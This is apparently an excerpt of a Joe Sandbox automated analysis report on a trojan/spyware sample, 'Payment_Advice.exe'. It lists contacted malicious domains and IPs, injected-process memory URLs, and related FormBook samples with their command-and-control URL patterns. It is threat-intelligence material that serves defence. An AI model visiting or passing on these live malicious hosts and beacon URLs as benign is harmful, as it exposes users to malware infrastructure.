                                                                                    http://www.brownkrosshui.com/hesf/www.usbulletinnow.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.1320detailingsupplies.com/hesf/www.jf66899j.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.svgco.lifeexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.tygyro.com/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.tygyro.comReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.svgco.life/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.jimenezfarmersinsurance.shopexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.pancakesandwaflesbeverages.net/hesf/www.schistdisc.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9kexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.svgco.life/hesf/www.pancakesandwaflesbeverages.netexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.91fulizifen.comReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://ns.adobeSexplorer.exe, 0000000F.00000002.3850139219.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1587254963.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.pancakesandwaflesbeverages.net/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.91fulizifen.com/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.87b52.club/hesf/www.svgco.lifeexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-darkexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  75.2.115.196
                                                                                                  		www.87b52.clubUnited States
                                                                                                  		16509AMAZON-02UStrue
                                                                                                  77.222.40.147
                                                                                                  		www.othersidewear.comRussian Federation
                                                                                                  		44112SWEB-ASRUtrue
                                                                                                  66.96.160.140
                                                                                                  		www.im-newbie-journal.onlineUnited States
                                                                                                  		29873BIZLAND-SDUStrue
                                                                                                  170.33.13.246
                                                                                                  		overdue.aliyun.comSingapore
                                                                                                  		134963ASEPL-AS-APAlibabacomSingaporeE-CommercePrivateLimitedfalse
                                                                                                  142.234.186.98
                                                                                                  		www.91fulizifen.comUnited States
                                                                                                  		395954LEASEWEB-USA-LAX-11UStrue
                                                                                                  103.224.182.242
                                                                                                  		www.tygyro.comAustralia
                                                                                                  		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                  91.195.240.19
                                                                                                  		parkingpage.namecheap.comGermany
                                                                                                  		47846SEDO-ASDEfalse
                                                                                                  62.72.50.244
                                                                                                  		usbulletinnow.comGermany
                                                                                                  		5427PRTL-DEtrue

                                                                                                  General Information

                                                                                                  Joe Sandbox Version:38.0.0 Ammolite
                                                                                                  Analysis ID:1320960
                                                                                                  Start date and time:2023-10-06 15:44:08 +02:00
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 12m 19s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:31
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:1
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample file name:Payment_Advice.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@105/31@10/8
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 99%
                                                                                                  • Number of executed functions: 194
                                                                                                  • Number of non-executed functions: 219
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, rundll32.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, svchost.exe
                                                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, fe3cr.delivery.mp.microsoft.com
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  15:45:18API Interceptor1x Sleep call for process: Payment_Advice.exe modified
                                                                                                  15:45:23API Interceptor7012572x Sleep call for process: explorer.exe modified
                                                                                                  15:46:11API Interceptor7783638x Sleep call for process: cmd.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  75.2.115.196F#U0130YAT_TALEB#U0130-SALTIKMAKINA__AS_BESTKALIP_A.S.exeGet hashmaliciousFormBook, RedLineBrowse
                                                                                                  • www.hybridrate.com/bz24/
                                                                                                  Fiyat_Teklif_Erymetal_A.s_MKLoO8887.exeGet hashmaliciousFormBook, RedLineBrowse
                                                                                                  • www.hybridrate.com/bz24/
                                                                                                  SecuriteInfo.com.Variant.Jaik.39057.4222.31519.exeGet hashmaliciousUnknownBrowse
                                                                                                  • hostinga.imagecross.com/image-hosting-17/3keny.jpeg
                                                                                                  ir4uOmf7Ic.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • www.92dbxvhr.xyz/be03/?YfxhA2W=yZ2tR2aIub077a/vy7woE3/H7uql4cqd+BdZnWiuASMC0GCzjDrlE7a20IxpmNqzo2aw&5jutZ=0txPa
                                                                                                  PO-371240523.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.loiioo1.site/ca82/?W4=aDgxtMAVqgZllSWLFyeRl6lh+EK1aUkDjIUC5rmnbdl5K86wqQ19w1O/sKDk3IY+RFc/&u0DH=aL3TSZm0nZvtOrTp
                                                                                                  PO_383822.docGet hashmaliciousFormBookBrowse
                                                                                                  • www.batbatbat.net/sd03/?f4G0dr7=+n333/Os3+ZENO7ZV6T7++SqVJMU9gaNd8RrIz+AORJhv5tCRvqdHL7xPS0FOmBOCaqBcA==&fpEL6P=fR-XynpxGjH0rtQp
                                                                                                  copy_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.dp77.shop/he2a/?nTthCt=Nb/FKU1zdQBN+CSQ9lNkfNv7NMoqSEbAcLfmG2wKmrccvHfopsPLt/BWV5dbdU3xRW6p&s4ND=W48hC
                                                                                                  php.iniGet hashmaliciousUnknownBrowse
                                                                                                  • pitch.events/
                                                                                                  Arabian Aluminium Products Co. L.L.C-pdf-.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.ecorpay.biz/a09e/?4h8Pe=v0DpmlQHSdUdP6np&fFNH=97+dnwivbWuZbj6KXr7rP2QwDSSem1HbuJduwDlJK44J3UStfHHGUmLN/DDpGJPNO8cw
                                                                                                  PO 700125-pdf-.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.ecorpay.biz/a09e/?z8nxQx=97+dnwivbWuZbj6KXr7rP2QwDSSem1HbuJduwDlJK44J3UStfHHGUmLN/Aj5Jof1QZ13&lVnDHL=CpNlV2B8kD1P-t
                                                                                                  VCgLc3XXth.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.hr-energys.com/tc10/?Z4=JHTmh3EWKTPKf1cHLPJvR2ZFoVNC9AR7o7RzP26IdifzzOhK0sieS8LaPvWkJY6zfCOxZ5wHpw==&UZWh=5jfLYpLX3XFpgtE
                                                                                                  LANXESS India Private Limited-pdf-scan-copy.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.ecorpay.biz/a09e/?5j28vRex=97+dnwivbWuZbj6KXr7rP2QwDSSem1HbuJduwDlJK44J3UStfHHGUmLN/Aj5Jof1QZ13&b2=bRbDkTNp5ZeX
                                                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • www.bestshedstobuy.com/my24/?VlWD=+J//Ny9ZhLFW2AjEdvcSUPlox6uw5eu3qrMWbYLHwLIGOJmoe0z5z197zCtVZDfyHS8b&3ff=L2MtR2j8RXGxlFx
                                                                                                  SecuriteInfo.com.Variant.Jaik.110210.1452.31617.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.infotech.wiki/w14d/?c2Mhmv8=dl1tlOpb+xogHJBPJW+gVBSyFLzCo7G091N/hBKFN5v+H4cuYwRfI9nBHU5MN+t+4Xb8&k2Mx=6ll4iRq0VPkL_V
                                                                                                  OUTSTANDING PI770100059 SOA OCT 2022.IMGGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • www.vnsuda.lol/gkr4/?pVvPi=jRwH&9rW=i9EYUB6T86BTY8cTtp+oqcAuy+2swFSPHzn9C0Z+4aDcJRNIbQa89iKj2Vm4IUHpJGzLXK064b2B1kQWf+fbpqzjbVwvy3ABTg==
                                                                                                  payment_copy3_receipt.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.vnsuda.lol/veh0/?Ih=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxcBVbwiK5sALqSvQ==&mFN=9rZlrDXh
                                                                                                  OUTSTANDING PI770100059 SOA OCT 2022.IMGGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • www.vnsuda.lol/gkr4/?4hI=J6tlnlN8Ijsd&yHtdQNIh=i9EYUB6T86BTY8cTtp+oqcAuy+2swFSPHzn9C0Z+4aDcJRNIbQa89iKj2Vm4IUHpJGzLXK064b2B1kQWf+fbpqzjbVwvy3ABTg==
                                                                                                  payment_copy2_receipt.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.vnsuda.lol/veh0/?V8Olq=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdalfssqJOBdyR5lth/WdqURqv&3fiPC=E4O8TXhX80iDs
                                                                                                  payment_copy4_receipt.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.vnsuda.lol/veh0/?J48Lf=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxcBVbwiK5sALqSvQ==&LBml=4hcHOtVX
                                                                                                  payment_copy_receipt_file.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.vnsuda.lol/veh0/?cTzDz=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdamLLi8VPA87O51th/Xl7Zxqv&ollLV=1b8dV0lh
                                                                                                  170.33.13.246SecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exeGet hashmaliciousUnknownBrowse
                                                                                                  • www.wpsss.com/myphp/qq.php?k=01635e79b15b98a2eec057d73b54687f
                                                                                                  SecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exeGet hashmaliciousUnknownBrowse
                                                                                                  • www.wpsss.com/myphp/qq.php?k=4fd39f28f7ba8fa8c2b0e633ac949a3a
                                                                                                  YSpCB8DEek.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.swegon.tech/nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  parkingpage.namecheap.comSwift_TT_Copy.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 91.195.240.19
                                                                                                  PO4502726800.xlsGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 91.195.240.19
                                                                                                  Payment_Advise_4_10_23_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 91.195.240.19
                                                                                                  4TwB845pSG.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 91.195.240.19
                                                                                                  NDICvIaSKd.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 91.195.240.19
                                                                                                  xzc3_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 91.195.240.19
                                                                                                  SecuriteInfo.com.Exploit.CVE-2018-0798.4.10125.11811.rtfGet hashmaliciousFormBookBrowse
                                                                                                  • 91.195.240.19
                                                                                                  DHL_Shipment_Delivery_Notification_27-9-23.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 198.54.117.218
                                                                                                  rOrderRequirements-Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 198.54.117.212
                                                                                                  SecuriteInfo.com.Trojan.Inject4.61235.12113.20285.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 198.54.117.210
                                                                                                  SecuriteInfo.com.Win32.DropperX-gen.29632.23307.exeGet hashmaliciousDBatLoader, FormBook, MagniberBrowse
                                                                                                  • 198.54.117.218
                                                                                                  U8WCyVn8Mu.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 198.54.117.210
                                                                                                  Request_for_Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 198.54.117.211
                                                                                                  DHL_CUSTOM_FORM.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 198.54.117.218
                                                                                                  SecuriteInfo.com.Win32.DropperX-gen.3821.25987.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 198.54.117.218
                                                                                                  DHL_AWB#607853880911.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 198.54.117.215
                                                                                                  New_Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 198.54.117.212
                                                                                                  0SsOGWQQTe.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 198.54.117.215
                                                                                                  7LCsfHZ06y.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 198.54.117.217
                                                                                                  kyvhU0KdbE.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 198.54.117.211
                                                                                                  overdue.aliyun.comSecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 170.33.13.246
                                                                                                  SecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 170.33.13.246
                                                                                                  file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                  • 170.33.13.246
                                                                                                  YSpCB8DEek.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.13.246
                                                                                                  w8jII3Mlbs.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.96.51
                                                                                                  PO 80555231 Pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.96.51
                                                                                                  2384de40-a1de-4db0-a358-6ea765fb272a.pptxGet hashmaliciousUnknownBrowse
                                                                                                  • 170.33.9.230
                                                                                                  e-dekont.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  kgKZQkHkMV.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  6hyWrD20Ho.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  PO.xlsxGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  Alligator Pty Ltd Quote.docGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  Lv9eznkydx.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 170.33.9.230
                                                                                                  UZOM POWER.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  Af2ehGbXlD.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  DHL Shipment Notification.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  DHL Shipment Notification,PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  Drawing.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  TT-Bank-Slip.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  Product_Samples.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230

                                                                                                  ASNs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  SWEB-ASRUDOGMFxuJPr.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 77.222.59.244
                                                                                                  https://u.to/vZehHwGet hashmaliciousUnknownBrowse
                                                                                                  • 77.222.40.36
                                                                                                  6lN7x5JqIM.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  • 77.222.55.34
                                                                                                  G3ASZOXI97.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  • 77.222.55.34
                                                                                                  hxxp://freddydal2%5B.%5Dtemp%5B.%5Dswtest%5B.%5Dru/AG/PrGet hashmaliciousUnknownBrowse
                                                                                                  • 77.222.41.18
                                                                                                  Nuevo_orden..exeGet hashmaliciousFormBookBrowse
                                                                                                  • 77.222.40.224
                                                                                                  tpUYHAXcpu.exeGet hashmaliciousDCRat, zgRATBrowse
                                                                                                  • 77.222.40.238
                                                                                                  aZDSUPv6IlTFjIz.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 77.222.61.31
                                                                                                  Tpeknp6cVT.exeGet hashmaliciousDCRatBrowse
                                                                                                  • 77.222.40.105
                                                                                                  ZJ79K2xku4.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 77.222.40.224
                                                                                                  lnk_.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 77.222.40.224
                                                                                                  lnk2.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 77.222.40.224
                                                                                                  wxr5X61VIQ.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 77.222.40.224
                                                                                                  PSBkh0tA84.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 77.222.40.224
